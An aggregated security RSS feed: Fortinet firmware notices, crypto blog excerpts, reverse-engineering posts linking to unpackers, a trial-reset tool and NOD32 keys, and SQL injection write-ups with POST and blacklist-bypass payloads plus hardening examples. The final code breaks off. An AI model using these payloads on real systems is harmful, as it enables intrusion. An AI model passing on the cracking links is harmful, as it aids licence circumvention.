http://pub.kb.fortinet.com/rss/firmware.xml FortiOS 4.3.10 B0639 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FGT_800, FGT_3600, FGT_300A, * FGT_100A, FGT_200A, FGT_400A, * FGT_500A, FGT_800F, FGT_5001FA2, * FGT_1000A, FGT_5001, FGT_5005, * FGT_3810A, FGT_50B, FWF_50B, * FGT_3016B, FGT_310B, FGT_30B, * FGT_5005FA2, FGT_224B, FWF_60B, * FGT_60B, FGT_1000AFA2, FGT_1000A_LENC, * FGT_3600A, FGT_5002FB2, FGT_5001A, * FGT_620B, FOC_5001, FOC_5005FA2, * FOC_3810A, FGT_110C, FOC_WF_60B, * FGT_111C, FGT_51B, FGT_80C, * FWF_80CM, FGT_311B, FWF_30B, * FGT_82C, FWF_81CM, FGT_ONE, * FGT_1240B, FGT_3950B, FGT_3951B, * FOC_60B, FOC_5001A, FOC_5001FA2, * FGT_80CM, FGT_200B, FGT_200B_POE, * FGT_310B_DC, FGT_620B_DC, FOC_3950B, * FOC_3951B, FGT_3040B, FGT_621B, * FGT_3140B, FGT_5001B, FGT_60C, * FGT_VM32, FK_3810A, FK_5001A, * FK_3950B, FK_3951B, FSW_5203B, * FWF_60CX_A, FWF_60CM, FGT_300C, * FOC_80C, FOC_5001B, FK_5001B, * FGT_VM64, FGT_600C, FGT_1000C, * FGT_40C, FGT_20C, FWF_20C, * FGT_100D, FGT_5101C, FGT_3140B_LENC, * FGT_3140B_DC, FGT_3040B_LENC, FGT_3040B_DC, * FGT_800C

==> FortiWeb 4.4.2

http://pub.kb.fortinet.com/rss/firmware.xml FortiWeb 4.4.2 B0651 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FWB_400B, FWB_400C, FWB_1000B, * FWB_1000C, FWB_3000C, FWB_3000CFSX, * FWB_4000C, FWB_VM-64bit

==> FortiOS 4.2.13

http://pub.kb.fortinet.com/rss/firmware.xml FortiOS 4.2.13 B0349 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FGT_30B, FK_3810A, FK_5001A, * FGT_50B, FGT_51B, FGT_60B, * FGT_80C, FGT_80CM, FGT_82C, * FGT_100A, FGT_200A, FGT_110C, * FGT_111C, FGT_200B, FGT_224B, * FGT_300A, FGT_310B, FGT_310B_DC, * FGT_311B, FGT_400A, FGT_500A, * FGT_620B, FGT_620B_DC, FGT_800, * FGT_800F, FGT_1000A, FGT_1000AFA2, * FGT_1000A_LENC, FGT_3016B, FGT_3600A, * FGT_3810A, FGT_5001, FGT_5001A, * FGT_5001FA2, FGT_5005FA2, FOC_3810A, * FOC_5001, FOC_5001A, FOC_5001FA2, * FOC_5005FA2, FWF_30B, FWF_50B, * FWF_60B, FWF_80CM, FWF_81CM, * FGT_1240B, FGT_3600, FGT_200B_POE, * FGT_ONE, FGT_60C, FGT_3950B, * FGT_3951B, FGT_3040B, FGT_621B, * FK_3950B, FK_3951B, FWF_60C, * FGT_VM, FGT_621B_DC, FGT_5001B, * FGT_3140B, FWF_60CM, FK_5001B, * FWF_60CX_A, FGT_3950B_LENC, FGT_300C,

==> FortiSwitch 4.3.3

http://pub.kb.fortinet.com/rss/firmware.xml FortiSwitch 4.3.3 B0135 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FS_5003B, FS_5003A

==> FortiVoiceOS 2.0.0

http://pub.kb.fortinet.com/rss/firmware.xml FortiVoiceOS 2.0.0 B0086 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FVC_200D

==> FortiClient Android 4.1.0

http://pub.kb.fortinet.com/rss/firmware.xml FortiClient Android 4.1.0 B0016 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * Android

==> FortiAP 4.3.9

http://pub.kb.fortinet.com/rss/firmware.xml FortiAP 4.3.9 B0228 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FAP_210B, FAP_220A, FAP_220B, * FAP_222B, FAP_221B

==> FortiOS 4.3.9

http://pub.kb.fortinet.com/rss/firmware.xml FortiOS 4.3.9 B0637 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FGT_800, FGT_3600, FGT_300A, * FGT_100A, FGT_200A, FGT_400A, * FGT_500A, FGT_800F, FGT_5001FA2, * FGT_1000A, FGT_5001, FGT_5005, * FGT_3810A, FGT_50B, FWF_50B, * FGT_3016B, FGT_310B, FGT_30B, * FGT_5005FA2, FGT_224B, FWF_60B, * FGT_60B, FGT_1000AFA2, FGT_1000A_LENC, * FGT_3600A, FGT_5002FB2, FGT_5001A, * FGT_620B, FOC_5001, FOC_5005FA2, * FOC_3810A, FGT_110C, FOC_WF_60B, * FGT_111C, FGT_51B, FGT_80C, * FWF_80CM, FGT_311B, FWF_30B, * FGT_82C, FWF_81CM, FGT_ONE, * FGT_1240B, FGT_3950B, FGT_3951B, * FOC_60B, FOC_5001A, FOC_5001FA2, * FGT_80CM, FGT_200B, FGT_200B_POE, * FGT_310B_DC, FGT_620B_DC, FWF_60C, * FOC_3950B, FOC_3951B, FGT_3040B, * FGT_621B, FGT_3140B, FGT_5001B, * FGT_60C, FGT_VM32, FK_3810A, * FK_5001A, FK_3950B, FK_3951B, * FSW_5203B, FWF_60CX_A, FWF_60CM, * FGT_300C, FOC_80C, FOC_5001B, * FK_5001B, FGT_VM64, FGT_600C, * FGT_1000C, FGT_40C, FWF_40C, * FGT_20C, FWF_20C, FGT_VM64_XEN, * FGT_100D, FGT_5101C, FGT_3140B_LENC, * FGT_3140B_DC, FGT_3040B_LENC, FGT_3040B_DC, * FGT_800C

==> FortiCache 2.1.2

http://pub.kb.fortinet.com/rss/firmware.xml FortiCache 2.1.2 B0173 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FCH1KC, FCH3KC, FCH4HC,

==> FortiVoice 7.2.0

http://pub.kb.fortinet.com/rss/firmware.xml FortiVoice 7.2.0 B002 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FVC_40, FVC_70, FVC_100,

==> FortiClient Android 4.0.1

http://pub.kb.fortinet.com/rss/firmware.xml FortiClient Android 4.0.1 B0010 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * Android

==> FortiClient iOS 2.0.1

http://pub.kb.fortinet.com/rss/firmware.xml FortiClient iOS 2.0.1 B117 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * iOS

==> FortiWeb 4.4.1

http://pub.kb.fortinet.com/rss/firmware.xml FortiWeb 4.4.1 B0644 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FWB_400B, FWB_400C, FWB_1000B, * FWB_1000C, FWB_3000C, FWB_3000CFSX, * FWB_4000C, FWB_VM-64bit

==> FortiAnalyzer 4.3.5

http://pub.kb.fortinet.com/rss/firmware.xml FortiAnalyzer 4.3.5 B0680 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FLG_100B, FLG_100C, FLG_400B, * FLG_800, FLG_800B, FLG_1000B, * FLG_1000C, FLG_2000, FLG_2000A, * FLG_2000B, FLG_4000, FLG_4000A, * FLG_4000B, FLG_VM32, FLG_400C, * FLG_VM64

==> Toggl time-tracking service failures

http://rdist.root.org/feed/ A while ago, we investigated using various time-tracking services. Making this quick and easy for employees is helpful in a consulting company. Our experience with one service should serve as a cautionary note for web 2.0 companies that want to sell to businesses. Time tracking is a service that seems both boring and easy to [...]

==> Cyber-weapon authors catch up on blog reading

http://rdist.root.org/feed/ One of the more popular posts on this blog was the one pointing out how Stuxnet was unsophisticated. Its use of traditional malware methods and lack of protection for the payload indicated that the authors were either “Team B” or in a big hurry. The post was intended to counteract the breathless praise in the [...]

==> RSA repeats earlier claims, but louder

http://rdist.root.org/feed/ Sam Curry of RSA was nice enough to respond to my post. Here’s a few points that jumped out at me from what he wrote: RSA is in the process of fixing the downgrade attack that allows an attacker to choose PKCS #1 v1.5, even if the key was generated by a user who selected [...]

==> Why RSA is misleading about SecurID vulnerability

http://rdist.root.org/feed/ There’s an extensive rebuttal RSA wrote in response to a paper showing that their SecurID 800 token has a crypto vulnerability. It’s interesting how RSA’s response walks around the research without directly addressing it. A perfectly accurate (but inflammatory) headline could also have been “RSA’s RSA Implementation Contained Security Flaw Known Since 1998“. The research [...]

==> SSL optimization and security talk

http://rdist.root.org/feed/ I gave a talk at Cal Poly on recently proposed changes to SSL. I covered False Start and Snap Start, both designed by Google engineer Adam Langley. Snap Start has been withdrawn, but there are some interesting design tradeoffs in these proposals that merit attention. False Start provides a minor improvement over stock SSL, which [...]

==> Why stream ciphers shouldn’t be used for hashing

http://rdist.root.org/feed/ I recently saw a blog post that discussed using RC4 as an ad-hoc hash in order to show why CBC mode is better than ECB. While the author’s example is merely an attempt to create a graphic, it reminded me to explain why a stream cipher shouldn’t be used as a cryptographic hash. A [...]

==> OllyDbg 2.00.01 (Final)

http://reversengineering.wordpress.com/feed/ OllyDbg 2.0 is a 32-bit assembler-level analyzing Debugger with intuitive interface. It is especially useful if source code is not available or when you experience problems with your compiler. Requirements. Developed and tested mainly under Windows 2000 and Windows XP, but should work under any Windows version: 95, 98, ME, NT, 2000, XP, 2003 Server, [...]

==> PROTECTiON iD 6.4.0

http://reversengineering.wordpress.com/feed/ Features: - detection of every major PC ISO Game / Application protection - currently covers 475 detections, including win32/64 exe protectors & packers, .net protectors, dongles, licenses & installers - sector scanning CDs / DVDs for Copy Protections - files / folders can simply be drag & dropped into pid - strong scanning routines allowing [...]

==> StrongOD 0.3.4.639

http://reversengineering.wordpress.com/feed/ Make your OllyDbg Strong! This plug-in provides three kinds of ways to initiate the process: 1, Normal – And the same manner as the original start, the STARTUPINFO inside unclean data 2, CreateAsUser – User with a mandate to initiate the process of the user, so that the process running under the purview of the [...]

==> Broken links ! Links that do not work

http://reversengineering.wordpress.com/feed/ Hi dear friends, tell me about broken links in this post; I will find them on my system and after that I will try [...]

==> Trial Reset 4 Final

http://reversengineering.wordpress.com/feed/ Trial Reset 4 Final. Thanks fly to its programmer. http://rapidshare.com/files/409095074/Trial-Reset40Final.zip http://reversengineering.files.wordpress.com/2010/07/trial-reset40final-zip.jpg you know what to do;) Filed under: OTHER, TOOLS

==> The newest NOD32 keys with MVGM NOD32 Licence v1.0

http://reversengineering.wordpress.com/feed/ HI The newest NOD32 keys with MVGM NOD32 Licence v1.0 NOD32 [...]

==> TrialReset 4.0 Final (Public)

http://reversengineering.wordpress.com/feed/ Hi to all, I am here again; thank you for your support. A small program for removing the trial of apps. Works with all the widespread systems of protection. The interface is very simple: [...]

==> ODDragAttach 1.1

http://reversengineering.wordpress.com/feed/ Author Exile Description Choice is, it will add the window corresponding to the process of src and bin. Window, the process of selection, OD automatically minimize the window, select the target window, then maximize the window, OD. Note: Some versions of the OD program may cover an open button, can be changed according [...]

==> Attach Extended 0.1

http://reversengineering.wordpress.com/feed/ This is a really small plugin that I have written to improve the attach feature of OllyDbg. With this plugin, you can attach to a process by specifying its PID directly, not only by selecting it from the process list. In addition, you can find the PID of a process by dragging a small cursor over each window (This can be used on [...]

==> Mapimp 0.4

http://reversengineering.wordpress.com/feed/ Author takerZ Description This is an open source OllyDbg plugin which will help you to import map files exported by IDA or Dede. There are many plugins using which you can perform similar actions, but mapimp: - Recognizes debugged file segments and applies names correctly - Has an option to overwrite or skip [...]

==> Obsidium 1.4.x.x OEP Finder + IAT Repair v0.1

http://reversengineering.wordpress.com/feed/ http://letitbit.net/download/7203.a79ca10d2342f1b32333add72/Obsidium_1.4.x.x_OEP_Finder___IAT_Repair_v0.1.txt.html Author Pavka Posted in Scripts, TOOLS

==> MUltimate Assembler 1.2

http://reversengineering.wordpress.com/feed/ Author RaMMicHaeL A multi-line (dis)assembler tool, perfect for writing code caves. It supports: - labels and data (C-style string) - external jumps and calls. http://letitbit.net/download/6671.c63ed09074b57c49b4cd2067e/MUltimate_Assembler_v1.2.rar.html Posted in OLLY'S PLUGINS, TOOLS

==> VMProtect 1.7 – 1.8 OEP Finder + Unpack Helper v1.0

http://reversengineering.wordpress.com/feed/ http://letitbit.net/download/2516.25addf1167522eb8602b67146/VMProtect_1.7___1.8_OEP_Finder___Unpack_Helper_v1.0.txt.html by LCF-AT Posted in Scripts, TOOLS

==> CodeDoctor 0.90

http://reversengineering.wordpress.com/feed/ Functions: 1) Deobfuscate Select instructions in disasm window and execute this command. It will try to clear the code from junk instructions. Example: Original: 00874372 57 PUSH EDI 00874373 BF 352AAF6A MOV EDI,6AAF2A35 00874378 81E7 0D152A41 AND EDI,412A150D 0087437E 81F7 01002A40 XOR EDI,402A0001 00874384 01FB ADD EBX,EDI 00874386 5F POP EDI Deobfuscated: 00874372 83C3 04 [...]

==> Themida + WinLicense 1.1.0.0 – 2.1.0.0 Dumper + IAT Repair + CodeEncrypt Repair v2.6.0

http://reversengineering.wordpress.com/feed/ by Quosego http://letitbit.net/download/5120.c5ff8c01bf87b5594de7f4fbc/Themida___WinLicense_1.1.0.0___2.1.0.0_Dumper___IAT_Repair___CodeEncrypt_Repair_v2.6.0.txt.html Posted in Scripts, TOOLS

==> Scripad 1.0 + ODBGScript 1.77.3

http://reversengineering.wordpress.com/feed/ ODbgScript is a plugin for OllyDbg, which is, in our opinion, the best application-mode debugger out there. One of the best features of this debugger is the plugin architecture which allows users to extend its functionality. ODbgScript is a plugin meant to let you automate OllyDbg by writing scripts in an assembly-like language. Many tasks [...]

==> StrongOD 0.2.6.415

http://reversengineering.wordpress.com/feed/ This will be a separate download of StrongOD as of version 0.2.4.350 because – as strange as it sounds – the developer has protected it! This plugin will now require a key for it to run and be used. You can obtain a valid key by emailing: StrongODsafengine.com http://letitbit.net/download/9563.9f5459d00eca80b4993740279/StrongOD_v0.2.6.415.rar.html Posted in OLLY'S PLUGINS, TOOLS

==> PDF Protection Remover 3.0

http://reversengineering.wordpress.com/feed/ http://letitbit.net/download/8140.813d385e39b7bcbb34ccc58af/PDF_Protection_Remover_3.0___Patch_DJiNN.rar.html pass :www.2baksa.net Posted in TOOLS, Uncategorized

==> HOlly 0.2 Build 81

http://reversengineering.wordpress.com/feed/ This is my OllyDbg mod named HOlly. I will be constantly adding features as I require them or they are requested. Currently it only has a multiline assembler that needs some work but I would like some input. So if I could get some input on the following that would be great. http://letitbit.net/download/3997.d3730400452d29f3a615da1f7/HOlly_v0.2_Build_81.rar.html Posted in [...]

==> Themida+WL1.1.0.0-2.1.0.0Dumper+IAT Repair+CodeEncryptRepair_v2.6.0

http://reversengineering.wordpress.com/feed/ Themida+WL1.1.0.0-2.1.0.0Dumper+IAT Repair+CodeEncryptRepair_v2.6.0 By [SND]quosego Hi all, It’s time to make a final stand. Oreans it’s your turn now. This package includes the following; WL.&.TM.VM.dumper.&.IAT.CodeEnc.Fixer.v2.6.0-SnD A script to unpack all known versions of Winlicense and Themida using any options. The script will unpack all known Themida and Winlicense applications using virtual machine antidump on Windows XP. [...]

==> PHP, variable variables, oh my!

http://rgaucher.info/feed/rss2 I was just looking at some PHP code for one of our clients, and found a case I haven't seen many times before. I thought I should share it here. The code I was looking at looks like this:

<?php
// Init the PHP array with some SQL code to start the query
$declareSQLArray = InitializedArray('stuff');

// Use a strong enough validation routine to do the input
// validation of POST variables
while(list($name, $value) = each($_POST)) {
    if(!is_array($value))
        $$name = StrongValidation($value);
    else
        $$name = $value;
}

// Do something with my variables and always do a proper
// validation when I use the data

// Eventually, build my SQL command, and send this to the DB
$sql_command = join(' ', $declareSQLArray);
mysql_query($sql_command);
?>

The code, even if horribly constructed, does not seem to show important weaknesses, apart from the usual case of submitting a POST variable as an array and bypassing StrongValidation. Then, in that case, it would have failed every other validation routine in the code. Even if you are experienced with PHP, you might not have encountered variable variables before. In short, they allow you to dynamically declare named variables. Here is a simple example:

hubert:~ Romain$ php -r '$name="foo"; $$name="Hello World!\n"; echo $foo;'
Hello World!

Here, the variable $foo gets declared and assigned using PHP's variable variables capability. Getting back to our code example, I'm sure the reader will spot the issue, and what an attacker can do to exploit such a scenario to trigger, in that case, a SQL injection. Since the variable $declareSQLArray is defined and initialized before the POST variables are looked up, it is possible to reassign it using variable variables. In that case, no validation is performed when we submit an array, and this is exactly what we want to do! To exploit the SQL injection, you only need to submit POST variables to overwrite $declareSQLArray, and add the content that we want to it!

POST /code_example.php HTTP/1.1
Host: example.com
...
declareSQLArray%5B%5D=SELECT...;&declareSQLArray%5B%5D=--&whatever...

Job done! The resulting SQL query will start with the payload that was submitted as part of $declareSQLArray. You've got your SQL injection.

Update: While driving back home, I was wondering if I could overwrite values from the SESSION using this technique. A couple of lines of code and a POST request later, the answer is short: YES. Imagine that you have an isadmin variable as part of the session (which is an associative array). This variable would be set in code like this:

if ($user->isNotAdmin())
    $_SESSION['isadmin'] = 0;
else
    $_SESSION['isadmin'] = 1;

Exploiting the previous weakness of the code example, we are able to overwrite the $_SESSION['isadmin'] content, only by supplying what will be interpreted as an associative array by PHP:

POST /code_example.php HTTP/1.1
Host: example.com
...
_SESSION%5Bisadmin%5D=1&whatever...

I'm sure you're thinking, as I do, that this is getting more interesting! Anyways, this issue is not new at all; it is known as Dynamic Variable Evaluation (thanks to Steve Christey). The interesting part of it is that DAST won't be able to detect it (or maybe if you are lucky enough), and it is very hard for a SAST to deal with it (actually, I doubt any SAST vendor who supports PHP handles this case, but it's not impossible since they have all they need to solve the problem).

Update 2: Based on the comments, I did some testing and observed that even if we can overwrite data from the session, this data does not get persisted in the session. This means that you can still control a value from a super global for the remaining execution of the script, but cannot persist the data.
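To make the overwrite concrete, here is the same bug class modelled in Python as an added example (not the author's PHP and not client code): a request parser that builds PHP-style lists and associative arrays from `name[]` and `name[key]` parameters, a handler that copies every POST parameter into its own namespace exactly as the `$$name = ...` loop does, and a hardened variant that reads only an explicit allow-list of names into a separate dictionary. `strong_validation` is a stand-in for the page's StrongValidation(), `INITIAL_SQL` stands in for InitializedArray('stuff'), and both request bodies are constructed.

```python
import re
from urllib.parse import parse_qsl


def strong_validation(value: str) -> str:
    """Stand-in for the page's StrongValidation(): keeps word characters only (assumption)."""
    return re.sub(r"\W", "", value)


def parse_form(body: str) -> dict:
    """Decode x-www-form-urlencoded data the way PHP fills $_POST: `a[]=x&a[]=y` becomes a
    list, `a[k]=x` becomes an associative array (dict), anything else a plain string."""
    post: dict = {}
    for raw_name, value in parse_qsl(body, keep_blank_values=True):
        m = re.fullmatch(r"([^\[\]]+)(?:\[([^\]]*)\])?", raw_name)
        if not m:
            continue
        name, key = m.group(1), m.group(2)
        if key is None:
            post[name] = value
        elif key == "":                         # name[]  -> append to a list
            post.setdefault(name, []).append(value)
        else:                                   # name[key] -> associative array
            post.setdefault(name, {})[key] = value
    return post


INITIAL_SQL = ["SELECT name FROM stuff"]       # assumed return value of InitializedArray('stuff')


def vulnerable_handler(post: dict) -> str:
    """Mirror of the PHP: the SQL array is initialised first, then every POST key becomes a
    variable of the same name ($$name).  Array values skip validation, and nothing stops a
    POST key from naming a variable the script already relies on."""
    scope = {"declareSQLArray": list(INITIAL_SQL)}
    for name, value in post.items():
        scope[name] = strong_validation(value) if isinstance(value, str) else value
    return " ".join(scope["declareSQLArray"])   # join(' ', $declareSQLArray)


ALLOWED_PARAMS = ("username", "page")           # assumed set of parameters the page really uses


def hardened_handler(post: dict) -> str:
    """Same flow, but request data lands in its own dict, only allow-listed names are read,
    and array-valued parameters are refused instead of being passed through unvalidated."""
    declare_sql_array = list(INITIAL_SQL)
    params = {}
    for name in ALLOWED_PARAMS:
        value = post.get(name)
        if isinstance(value, str):
            params[name] = strong_validation(value)
    # the handler would consume params["username"] etc. here; the query base is unreachable
    return " ".join(declare_sql_array)


# Constructed request bodies, URL-encoded as a browser or curl would send them.
ATTACK_BODY = ("declareSQLArray%5B%5D=SELECT+password+FROM+users%3B"
               "&declareSQLArray%5B%5D=--&username=bob")
SESSION_BODY = "_SESSION%5Bisadmin%5D=1&username=bob"

if __name__ == "__main__":
    post = parse_form(ATTACK_BODY)
    print("vulnerable:", vulnerable_handler(post))
    print("hardened:  ", hardened_handler(post))
    print("session:   ", parse_form(SESSION_BODY)["_SESSION"])
```

The fix is not a stronger StrongValidation(): the array branch never calls it, and even a validated string could still land on an unintended name. The fix is to stop mapping attacker-chosen keys onto the script's own variables at all.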

==> Dissection of a SQL injection challenge

http://rgaucher.info/feed/rss2 As part of the SQL injection challenges that I developed (focusing on MySQL), one of the classic challenges (we have the same types for XSS) is a simple, yet disturbing for juniors, black-list with a few controls such as partial output encoding. In the case of SQLi, I decided to blacklist the following keywords (as seen during an assessment):

    select, union, drop, delete, insert, and, or, where, update, if, not

On top of this, I use the mysqli function that properly escapes strings (mysqli_real_escape_string), and I remove all white-spaces. The SQL command goes through a driver that is aware of multiple queries (i.e., you can stack queries), and the injection context is fairly simple; we have something like this:

    SELECT username FROM users WHERE userid=<<HERE>>

Since this is an exploitation challenge, the goal is to extract the password of a given user from this database. Now, every time that I write a challenge, I first come up with the application and I need to break it afterwards to make sure that there is a solution (unless the challenge is derived from what I found already in some of my previous assessments). Anyway, here my main personal challenge was to come up with a query that would retrieve the proper data without using one of the black-listed keywords. Spaces and quotes are easy not to care about, simply by using /**/ as a word separator, and we can use the hexadecimal representation of strings so that we make sure not to use single quotes & co. Here is a quick summary with 2 similar queries:

* Spaces bypass: select/**/foobar/**/FROM/**/table/**/WHERE/**/user='c3';
* Single quotes: select foobar FROM table WHERE user=0x6333;

The way I found to solve this challenge is to use MySQL prepared statements. However, I was fairly disturbed at first since I cannot use the following syntax in MySQL:

    PREPARE st FROM 0x73656c656374202a2066726f6d207573657273; EXECUTE st; DEALLOCATE PREPARE st;

where 0x73656c656374202a2066726f6d207573657273 contains the query to get everything from the users table (i.e., select * from users). The syntax of the PREPARE keyword is not flexible like any other string manipulation in MySQL, and does not allow strings in their hexadecimal representation. The gotcha here (I wouldn't call this a trick) is to use a temporary variable assignment, and use this variable in the PREPARE construct. The final construct I used is the following:

    SET @v=0x73656c656374202a2066726f6d207573657273; PREPARE st FROM @v; EXECUTE st; DEALLOCATE PREPARE st;

Now, putting the pieces together, and adding this into our original query, we get a payload similar to this:

    9999||username=0xdeadbeef;SET/**/@s=0x73656c656374202a2066726f6d207573657273;PREPARE/**/ss/**/FROM/**/@s;EXECUTE/**/ss;DEALLOCATE/**/PREPARE/**/ss;#

This construct is very similar to the solution of the challenge, but not exactly the same since we need to use the application to display the data. Therefore, in that case we need to make sure that the prepared statement will return only one column, etc. Anyway, I wanted to share this since I haven't come across many references that talked about using prepared statements as SQL injection payloads...
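The challenge's controls and the two fixes they point to, as an added Python example that is not part of the post: the keyword black-list plus whitespace removal (with a simplified stand-in for mysqli_real_escape_string), the same black-list re-run after decoding MySQL hex literals, and the allow-list check on userid that actually closes the hole. The payload string is the post's own; the functions and the "1 OR 1=1" sample are constructed here.

```python
import re

# Keyword black-list from the challenge (the post's list), matched case-insensitively.
BLACKLIST = ("select", "union", "drop", "delete", "insert", "and", "or",
             "where", "update", "if", "not")

# The post's payload, kept as test input for the filters below.
PAYLOAD = ("9999||username=0xdeadbeef;SET/**/@s=0x73656c656374202a2066726f6d207573657273;"
           "PREPARE/**/ss/**/FROM/**/@s;EXECUTE/**/ss;DEALLOCATE/**/PREPARE/**/ss;#")


def contains_blacklisted(value):
    """True if any black-listed keyword appears as a substring (case-insensitive)."""
    lowered = value.lower()
    return any(kw in lowered for kw in BLACKLIST)


def challenge_filter(value):
    """The challenge's controls as the post describes them: strip all whitespace,
    reject black-listed keywords, escape quotes and backslashes (a simplified
    stand-in for mysqli_real_escape_string). Returns the filtered value, or None
    when the input is rejected. The post's payload survives this filter."""
    compact = re.sub(r"\s+", "", value)
    if contains_blacklisted(compact):
        return None
    return compact.replace("\\", "\\\\").replace("'", "\\'").replace('"', '\\"')


def decode_hex_literals(value):
    """Replace every MySQL 0x... literal by the text it encodes, so a keyword hidden
    in hex (0x73656c... is 'select * from users') becomes visible to the black-list."""
    def repl(match):
        digits = match.group(1)
        if len(digits) % 2:
            return match.group(0)  # odd length: not a byte string, leave it alone
        return bytes.fromhex(digits).decode("utf-8", errors="replace")
    return re.sub(r"0x([0-9a-fA-F]+)", repl, value)


def hardened_filter(value):
    """Same black-list, applied after hex literals are decoded. This catches the
    post's payload, but it is still a black-list; the allow-list below is the real fix."""
    compact = re.sub(r"\s+", "", value)
    if contains_blacklisted(decode_hex_literals(compact)):
        return None
    return compact


def validate_userid(value):
    """Allow-list check for the injection point: userid must be a plain integer.
    Returns the int, or None for anything else (including the whole payload)."""
    return int(value) if re.fullmatch(r"[0-9]{1,10}", value) else None


def build_query(userid):
    """Build the query with a bound parameter instead of string concatenation;
    the driver receives the SQL text and the value separately."""
    return "SELECT username FROM users WHERE userid=%s", (userid,)


if __name__ == "__main__":
    print("challenge filter lets the payload through:", challenge_filter(PAYLOAD) is not None)
    print("decoded hex literal:", decode_hex_literals("0x73656c656374202a2066726f6d207573657273"))
    print("hardened filter blocks it:", hardened_filter(PAYLOAD) is None)
    print("allow-list accepts 9999:", validate_userid("9999"),
          "and rejects the payload:", validate_userid(PAYLOAD))
```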

==> WASC Threat Classification 2 - Wordle

http://rgaucher.info/feed/rss2 I just dug that image out; I made it for the release of the WASC Threat Classification 2.0

==> Yes, we need a standard to evaluate SAST, but it ain't easy...

http://rgaucher.info/feed/rss2 In reply to Dinis's blog post: The Need for Standards to evaluate Static Analysis Tools

1. You unfortunately list few types of SAST. Many tools don't implement taint analysis -- if you go into the Ada/C/C++ world, you won't see much taint-based analysis, but other technologies such as symbolic execution (Grammatech), abstract interpretation (ASTREE, PolySpace, etc.), and more. A list of SAST can be found on the NIST SAMATE website: List of Source Code Security Analyzers

2. As said on twitter, concerning the WASSEC, I don't believe it's important to have public evaluation of commercial/open-source tools. Also, WASSEC lists some vulnerabilities that the tool should look for; we don't provide test cases, so it's not nearly possible to claim that a tool effectively tests for a given problem, e.g. the difference between two tools:
* One only tests XSS with a few payloads and does regexp matching of the rendered HTML
* A smarter engine automagically crafts attacks and looks at the resulting HTML with a JS engine (or so, which leads to fewer FP).
Depending on who you are and what you want, you might very well say that those two tools have the same support for XSS... Moreover, tools are changing so quickly that an evaluation would only be accurate at the time you make it.

3. NIST SATE is literally an exposition. NIST chooses test cases (real open-source programs that cover different types of functionalities and technologies) and asks tool makers to run their SAST on those programs. The goal isn't to compare the tools to claim that one is better than the other for a type of technology, but to see how tools (in general) perform, to see how many types of weaknesses the tools find and also what the overlap of tool findings is (which resulted in a very small amount of findings).

More generally, as Andrew said, a SAST isn't only an analysis engine that finds weaknesses in a program; it's a suite of functionalities:
* supported technologies
* allowing users to develop custom checks (or custom rules)
* displaying the weaknesses to the user (allowing to rank/prune and explain the problem) and reporting capabilities
Ultimately, every one of those elements is important and needs to be tested, but again, the importance of those depends on who you are and how you want to use the SAST (from a simple compliance type of scan to exhaustive security testing). Just to tell you, NIST SAMATE (organizers of SATE) have been thinking a lot about those problems and there is no easy solution for evaluating SAST... But the last SATE report explains some of the problems we (I was part of the SAMATE team at the time) faced: SATE 2008 - NIST Special Publication 500-279

==> Data driven factory: I give you data, you give me an object...

http://rgaucher.info/feed/rss2 I've been working on a data warehouse project lately, in Python, to support different kinds of data analysis I am developing as part of my current work. I decided to use SQLAlchemy as the ORM; I can then quickly move from my development version using an SQLite database to production, using MySQL or MSSQL databases. SQLAlchemy is also one of these amazing ORMs that support sharding -- it's not necessary to say that this is very important when you develop a tool that will import, format, process and analyze gigabytes of data. Also, working with a lot of data types, to register them into my ORM instance and to persist them into a database, I need my software to be able to quickly generate an object representing the data type: a particular instance of the object.

Developers usually create factories in order to create instances of objects. The main idea is to delegate the instantiation of the object to a third-party object. In most factories, we specify the type of object that we want to create: give me an instance of a pizza with mushrooms, tomatoes and ham. The last point, asking for a particular type (or sub-type) of object, was the main limitation for my use. In fact, most of my types are related in some ways, but without strong inheritance (Dish > Pie > Pizza); another important point is the maintainability of code where I would list all the different types of object my factory needs to create... Well, I wanted something more generic: a data driven factory.

The data driven factory is a factory that, based on the data sent to the factory object constructor, will produce an instance. A simple example would be to be able to get an instance of a Margherita pizza when giving certain ingredients (tomatoes, mozzarella and parmesan), or a Neapolitan if I add anchovies. This type of factory, which depends only on the data given as parameters, is possible in Python by using the class inspection capabilities of the language. In fact, the implementation I propose requires registering each class to be constructed in the factory; constructor arguments (and default arguments) will be analyzed for a matcher later on. You then give as arguments the "type" of each data field (basically, the argument names), and the factory will get the appropriate object for you.

Side note: the fact that the factory doesn't return an instance of an object is for performance. In fact, I get the class from the factory, store it and loop through the instantiation with millions of data...

Example of use:

    class Shape(object):
        pass

    class Circle(Shape):
        def __init__(self, center, radius=RAD_MAX):
            ...

    class DiskHole(Shape):
        def __init__(self, center, radius, small_radius=RAD_SMALL):
            ...

    factory = DDFactory()
    factory.register(Shape)
    factory.register(Circle)
    factory.register(DiskHole)
    print factory.get(['center', 'radius'])                  #> returns 'Circle' ctor
    print factory.get(['center', 'radius', 'small_radius'])  #> returns 'DiskHole' ctor

You can access this factory here: dd_factory.py

In the distributed code, I assume that each object to create has a __tablename__ class member that tells which database table is the eventual target (which is my case using SQLAlchemy / declarative objects). This is easy to change by replacing the factory register method by something like this:

    def register(self, cls):
        if hasattr(cls, '__init__'):
            s_cls = str(cls)
            args, defaults_dict = DDFactory.defaults_values(cls)
            if s_cls not in self.registrar:
                self.registrar[s_cls] = {'class' : cls, 'args' : args, 'defaults' : defaults_dict}
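A self-contained version of the data driven factory in Python 3, added here as an example and not the post's dd_factory.py: the matching rule in get() is my own assumption (required arguments must all be present, no unknown field allowed, fewest unfilled defaults wins), and RAD_MAX / RAD_SMALL are given made-up values.

```python
import inspect

RAD_MAX = 10.0    # assumed defaults; the post leaves RAD_MAX / RAD_SMALL undefined
RAD_SMALL = 1.0


class Shape(object):
    pass


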